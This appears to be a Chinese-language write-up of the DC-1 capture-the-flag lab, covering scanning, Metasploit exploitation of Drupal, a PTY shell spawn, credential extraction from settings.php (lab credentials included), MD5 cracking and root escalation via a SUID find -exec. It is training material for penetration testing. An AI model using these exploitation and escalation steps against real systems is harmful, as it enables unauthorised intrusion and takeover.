靶机 DC_1

DC_1

信息搜集

存活检测

靶机 DC_1_第1张图片

详细扫描

靶机 DC_1_第2张图片

网页目录扫描

靶机 DC_1_第3张图片

网页信息搜集

  • cms 为 Drupal

    靶机 DC_1_第4张图片

    靶机 DC_1_第5张图片

    靶机 DC_1_第6张图片

漏洞利用

  • 使用 msf 搜索 drupal 的漏洞

    启动

    msfconsole
    

    搜索

    search drupal
    

    靶机 DC_1_第7张图片

  • 尝试编号为 0 的漏洞

    靶机 DC_1_第8张图片

    失败

  • 利用编号为 1 的漏洞

    use 1
    

    查看需要配置的选项

    show options
    

    靶机 DC_1_第9张图片

    设置目标 ip

    set rhost 10.4.7.145
    

    启动

    run
    
  • 成功建立连接

    靶机 DC_1_第10张图片

  • 获取 shell 权限

    shell
    

    靶机 DC_1_第11张图片

  • 回显提示符

    python -c 'import pty;pty.spawn("/bin/bash")'
    

    image-20231022143959796

  • 第一个 flag

    靶机 DC_1_第12张图片

  • 查看 drupal 默认配置文件

    路径

    /var/www/sites/default
    
    cat settings.php
    

    靶机 DC_1_第13张图片

数据库登录

  • 在 drupal 配置文件中查找到了第二个 flag 以及数据库的账密信息

    用户名:dbuser
    密码:R0ck3t
    

    靶机 DC_1_第14张图片

  • 成功登录数据库

    靶机 DC_1_第15张图片

  • 搜集有用信息

    靶机 DC_1_第16张图片

  • 查看 users 表

    靶机 DC_1_第17张图片

  • md5 解密

    密码为 53cr3t

    靶机 DC_1_第18张图片

  • admin 登录

    靶机 DC_1_第19张图片

    在 content 目录下拿到第三个 flag

    靶机 DC_1_第20张图片

  • 提示 perms find -exec

提权

  • 查找具有 suid 权限的命令

    具有 suid 权限的命令在使用时会以命令所有者的权限运行

    命令的所有者一般为 root

    find / -perm -4000 2>/dev/null
    

    靶机 DC_1_第21张图片

  • find 提权

    find \ a -exec 'bash' \;
    

    image-20231022151648735

  • bash 提权失败,尝试使用 sh

    靶机 DC_1_第22张图片

    成功 root

  • final flag

    靶机 DC_1_第23张图片

总结

  • Metasploit 漏洞利用
  • find 提权

你可能感兴趣的:(渗透测试,chrome,前端,php,网络安全,linux,安全,网络)